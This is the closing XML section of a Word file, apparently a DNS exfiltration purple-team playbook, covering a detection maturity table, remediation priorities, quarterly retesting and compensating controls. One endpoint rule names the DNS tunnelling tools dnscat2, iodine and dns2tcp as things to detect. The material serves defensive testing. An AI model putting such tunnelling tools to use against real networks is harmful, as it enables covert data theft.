            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Intermediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="60E0481B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Encoding-agnostic entropy, all record types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="173B106C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1–5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="14EC032D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="094D202B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6ED7C758" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="67075DDF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Full FQDN analysis, domain baselining, long-horizon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="20A92B3A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1–9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="199EBF16" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3D42842E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3BD5A058" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Mature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0D751C53" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">All above + tunnel detection + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DoH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> compensating + Splunk integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="60CC5326" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1–13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A156024" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21164B47" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>11.2 Remediation Priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F52A28E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Address gaps in order of the maturity model. Each level should be fully validated before moving to the next. The vendor should provide a timeline for impl</w:t>
      </w:r>
      <w:r>
        <w:t>ementing missing rules, and each rule should be retested after implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50331187" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52345044" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>11.3 Recurring Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF833F2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Re-run this full playbook quarterly or after any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EfficientIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> firmware/rule update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BED8C54" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Add new scenarios as new DNS exfiltration techniques emerge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232D3BF3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Include DNS exfiltration detection validation in the annual penetration testing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>programme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19618D0E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6D1944" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">11.4 Compensating Controls Beyond </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>EfficientIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A6F34F9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Firewall: Block outbound DNS (port 53) to any resolver except </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EfficientIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — prevents attackers from bypassing it entirely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2750042F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Firewall/Proxy: Block outbound HTTPS to known </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DoH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> providers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BD3CBE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Endpoint Detection: Alert on use of dnscat2, iodine, dns2tcp, or sim</w:t>
      </w:r>
      <w:r>
        <w:t>ilar tools via process name or hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD00B4E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Network Segmentation: High-value assets should only resolve DNS through monitored, internal resolvers</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005B2212">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E7138" w14:textId="77777777" w:rsidR="002170E7" w:rsidRDefault="002170E7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="00EBA068" w14:textId="77777777" w:rsidR="002170E7" w:rsidRDefault="00217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06568" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="D9D9D9"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="D9D9D9"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="D9D9D9"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="D9D9D9"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00407471">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="D9D9D9"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="D9D9D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72796" w14:textId="77777777" w:rsidR="002170E7" w:rsidRDefault="002170E7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="12A4CF8F" w14:textId="77777777" w:rsidR="002170E7" w:rsidRDefault="00217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E696A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:color w:val="D9D9D9"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>DNS Exfiltration Purple Team Playbook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610D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE428EEE"/>
    <w:lvl w:ilvl="0" w:tplc="C632E922">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7F54397A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4ECA1966">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DDAEFF64">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="573E3632">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6F349556">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6E9A89E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E4425FCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8FF88B1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212"/>
    <w:rsid w:val="002170E7"/>
    <w:rsid w:val="00407471"/>
    <w:rsid w:val="005B2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FC8FD"/>
  <w15:docId w15:val="{7545EED5-2CF2-4285-8FF3-BCEE1D140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40404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3978</Words>
  <Characters>22676</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>188</Lines>
  <Paragraphs>53</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>26601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a.alex.arvinte@gmail.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-15T19:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-15T20:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>